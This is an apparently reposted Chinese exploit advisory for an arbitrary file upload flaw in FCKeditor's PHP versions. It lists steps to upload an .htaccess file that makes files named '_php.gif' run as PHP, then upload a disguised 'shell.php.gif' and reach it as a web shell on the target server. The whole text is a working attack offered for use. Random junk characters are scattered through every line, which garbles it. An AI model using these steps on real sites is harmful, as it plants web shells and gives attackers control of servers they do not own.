FCKeditor所有php版本Upload上传漏洞
1 r3 P/ H6 q, ]- k: s作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
& d' _1 P3 R! q. r8 ^减小字体 增大字体: X! J: `! y3 {3 [5 x# ?
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
; r4 U/ O* x# m7 m4 O7 H0 D[+] Date: 2011 Z' v, J2 p8 g5 r# x/ A) ?3 P. p
[+] Author : sinesafe.cn
( ~0 L( ^4 X9 J/ @2 w: @- h# C2 P) z[+] Website : WwW.sinesafe.cn; R2 m$ ?4 a% `7 T9 H' L2 a* R
———————————————————* U$ i1 r, B1 k/ x+ ~5 {
1.create a htaccess file:
8 R: j* n$ b% _9 L& r: u& H+ f0 Qcode:
4 O) x- ~+ b. Y2 c$ k( z<FilesMatch “_php.gif”>9 o% r% j$ v h& C; ~3 l* d, J
SetHandler application/x-httpd-php
7 W/ k% g+ ^1 I" w! N6 g. b</FilesMatch>. w- M8 U/ J: }& ^- k
1 _0 w% @/ u" f& ]4 N( Z5 ^1 M
2.Now upload this htaccess with FCKeditor.: b( ^2 p2 q" h9 N7 X2 j8 Q4 E
+ d' v. X/ f% O" ?$ |http://www.sinesafe.cn/FCKeditor ... er/upload/test.html* S7 _) [; G0 U( V2 b7 m
# ~( Z9 x$ F$ S2 y* Y: g
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
- ^# n8 i% C' K, ?7 m
' x* d* z4 Q, X8 `8 @2 q. K) ^———————————————————————————————-& n7 |2 b% d$ S0 ~
3.Now upload shell.php.gif with FCKeditor.- s! ~+ C9 ~1 X9 l( _
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
7 T5 B) O8 o9 i7 b, Z0 N( A F5.http://www.sinesafe.cn/anything/shell_php.gif& ]9 ^) Y! G0 R/ M
6.Now shell is available from server. |
$ E% d/ [3 N+ M( b% c+ ~$ p7 T
) |# \$ ~/ f$ N* M% |# O+ d$ D3 L0 P" X7 c. u: L7 u- d. ^0 f
|